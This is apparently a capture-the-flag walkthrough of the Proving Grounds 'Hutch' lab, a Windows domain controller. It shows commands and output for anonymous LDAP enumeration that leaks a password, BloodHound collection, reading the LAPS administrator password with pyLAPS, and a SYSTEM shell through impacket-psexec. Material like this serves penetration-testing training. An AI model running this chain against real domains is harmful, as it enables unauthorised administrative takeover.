Hutch

Apparently I did not do the expected method of solving this box but it worked out in the end

Proving Grounds -Hutch (Intermediate) Windows Box -Walkthrough — A Journey to Offensive SecurityMedium

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.231.122
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-04 13:49 +08
Nmap scan report for 192.168.231.122
Host is up (0.0095s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   Server Date: Tue, 04 Jun 2024 05:51:00 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_  Server Type: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-04 05:50:12Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-04T05:51:02
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.69 seconds

Initial Access

Enum4Linux

Null Credentials

$ enum4linux -a 192.168.231.122    
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jun  4 13:54:28 2024

 =========================================( Target Information )=========================================
                                                                                                                                                                                                                  
Target ........... 192.168.231.122                                                                                                                                                                                
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==========================( Enumerating Workgroup/Domain on 192.168.231.122 )==========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Can't find workgroup/domain                                                                                                                                                                                   
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

 ==============================( Nbtstat Information for 192.168.231.122 )==============================
                                                                                                                                                                                                                  
Looking up status of 192.168.231.122                                                                                                                                                                              
No reply from 192.168.231.122

 ==================================( Session Check on 192.168.231.122 )==================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Server 192.168.231.122 allows sessions using username '', password ''                                                                                                                                         
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ===============================( Getting domain SID for 192.168.231.122 )===============================
                                                                                                                                                                                                                  
Domain Name: HUTCH                                                                                                                                                                                                
Domain Sid: S-1-5-21-2216925765-458455009-2806096489

[+] Host is part of a domain (not a workgroup)                                                                                                                                                                    
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 =================================( OS information on 192.168.231.122 )=================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Can't get OS info with smbclient                                                                                                                                                                              
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Got OS info for 192.168.231.122 from srvinfo:                                                                                                                                                                 
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED                                                                                                                                            


 ======================================( Users on 192.168.231.122 )======================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED                                                                                                                                              
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED                                                                                                                                               
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ================================( Share Enumeration on 192.168.231.122 )================================
                                                                                                                                                                                                                  
do_connect: Connection to 192.168.231.122 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                                                                                                        

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.231.122                                                                                                                                                                   
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ==========================( Password Policy Information for 192.168.231.122 )==========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Unexpected error from polenum:                                                                                                                                                                                
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

[+] Attaching to 192.168.231.122 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:192.168.231.122)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.



[E] Failed to get password policy with rpcclient                                                                                                                                                                  
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

 =====================================( Groups on 192.168.231.122 )=====================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Getting builtin groups:                                                                                                                                                                                       
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting builtin group memberships:                                                                                                                                                                           
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting local groups:                                                                                                                                                                                        
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting local group memberships:                                                                                                                                                                             
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting domain groups:                                                                                                                                                                                       
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting domain group memberships:                                                                                                                                                                            
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 =================( Users on 192.168.231.122 via RID cycling (RIDS: 500-550,1000-1050) )=================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.                                                                                                                                         
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ==============================( Getting printer info for 192.168.231.122 )==============================
                                                                                                                                                                                                                  
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED                                                                                                                                           


enum4linux complete on Tue Jun  4 13:54:51 2024

Guest Credential

$ enum4linux -a -u 'guest' -p '' 192.168.231.122
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jun  4 13:56:03 2024

 =========================================( Target Information )=========================================
                                                                                                                                                                                                                  
Target ........... 192.168.231.122                                                                                                                                                                                
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==========================( Enumerating Workgroup/Domain on 192.168.231.122 )==========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Can't find workgroup/domain                                                                                                                                                                                   
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

 ==============================( Nbtstat Information for 192.168.231.122 )==============================
                                                                                                                                                                                                                  
Looking up status of 192.168.231.122                                                                                                                                                                              
No reply from 192.168.231.122

 ==================================( Session Check on 192.168.231.122 )==================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Server doesn't allow session using username 'guest', password ''.  Aborting remainder of tests.

Enumerating LDAP

So we will first enumerate LDAP using this command

$ ldapsearch -x -H ldap://192.168.231.122 -D '' -w '' -b "DC=hutch,DC=offsec"

There is something interesting here:

...
# Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please change on next login.
distinguishedName: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
instanceType: 4
whenCreated: 20201104053505.0Z
whenChanged: 20210216133934.0Z
uSNCreated: 12831
uSNChanged: 49179
name: Freddy McSorley
objectGUID:: TxilGIhMVkuei6KplCd8ug==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132489437036308102
lastLogoff: 0
lastLogon: 132579563744834908
pwdLastSet: 132489417058152751
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWwQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: fmcsorley
sAMAccountType: 805306368
userPrincipalName: fmcsorley@hutch.offsec
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec
dSCorePropagationData: 20201104053513.0Z
dSCorePropagationData: 16010101000001.0Z
lastLogonTimestamp: 132579563744834908
msDS-SupportedEncryptionTypes: 0
...

We can see that the user fmcsorley has the password CrabSharkJellyfish192.

When we try to enumerate the share folder, we get back no interesting results.

B         192.168.231.122 445    HUTCHDC          [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB         192.168.231.122 445    HUTCHDC          [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192 
SMB         192.168.231.122 445    HUTCHDC          [+] Enumerated shares
SMB         192.168.231.122 445    HUTCHDC          Share           Permissions     Remark
SMB         192.168.231.122 445    HUTCHDC          -----           -----------     ------
SMB         192.168.231.122 445    HUTCHDC          ADMIN$                          Remote Admin
SMB         192.168.231.122 445    HUTCHDC          C$                              Default share
SMB         192.168.231.122 445    HUTCHDC          IPC$            READ            Remote IPC
SMB         192.168.231.122 445    HUTCHDC          NETLOGON        READ            Logon server share 
SMB         192.168.231.122 445    HUTCHDC          SYSVOL          READ            Logon server share

Enumerating the Domain

The next step is to enumerate the domain using SharpHound. Since we cannot get a user shell, we will run SharpHound on linux to enumerate the domain.

$ bloodhound-python -c all -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -ns 192.168.231.122
INFO: Found AD domain: hutch.offsec
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (hutchdc.hutch.offsec:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 18 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: hutchdc.hutch.offsec
INFO: Done in 00M 04S

After we import the data into bloodhound, we can see that the user we owned have the ReadLAPSPassword Privilege.

Reading LAPS password

So the next step would be to try to get the LAPS Password so that we are able to login as the administrator directly

GitHub - p0dalirius/pyLAPS: Python setter/getter for property ms-Mcs-AdmPwd used by LAPS.GitHub

After following the instructions in the repo to get the password, we are able to get the LAPS password for HUTCHDC$.

$ ./pyLAPS.py --action get -u fmcsorley -d 'hutch.offsec' -p 'CrabSharkJellyfish192' --dc-ip 192.168.231.122
                 __    ___    ____  _____
    ____  __  __/ /   /   |  / __ \/ ___/
   / __ \/ / / / /   / /| | / /_/ /\__ \   
  / /_/ / /_/ / /___/ ___ |/ ____/___/ /   
 / .___/\__, /_____/_/  |_/_/    /____/    v1.2
/_/    /____/           @podalirius_           
    
[+] Extracting LAPS passwords of all computers ... 
  | HUTCHDC$             : B8}2F5,4b03298
[+] All done!

Next we will test if the password works and sure enough it works.

$ sudo crackmapexec smb 192.168.231.122 -u administrator -p 'B8}2F5,4b03298'                           
[sudo] password for ranay: 
SMB         192.168.231.122 445    HUTCHDC          [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB         192.168.231.122 445    HUTCHDC          [+] hutch.offsec\administrator:B8}2F5,4b03298 (Pwn3d!)

Lastly, we will just use impacket-psexec to get the Administrator shell.

$ impacket-psexec hutch.offsec/administrator:'B8}2F5,4b03298'@192.168.231.122         
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

[*] Requesting shares on 192.168.231.122.....
[*] Found writable share ADMIN$
[*] Uploading file ZlWYNOKQ.exe
[*] Opening SVCManager on 192.168.231.122.....
[*] Creating service MoUL on 192.168.231.122.....
[*] Starting service MoUL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

PreviousHeist NextInternal

Last updated 1 year ago

hashtagNmap Scan

hashtagInitial Access

hashtagEnum4Linux

hashtagNull Credentials

hashtagGuest Credential

hashtagEnumerating LDAP

hashtagEnumerating the Domain

hashtagReading LAPS password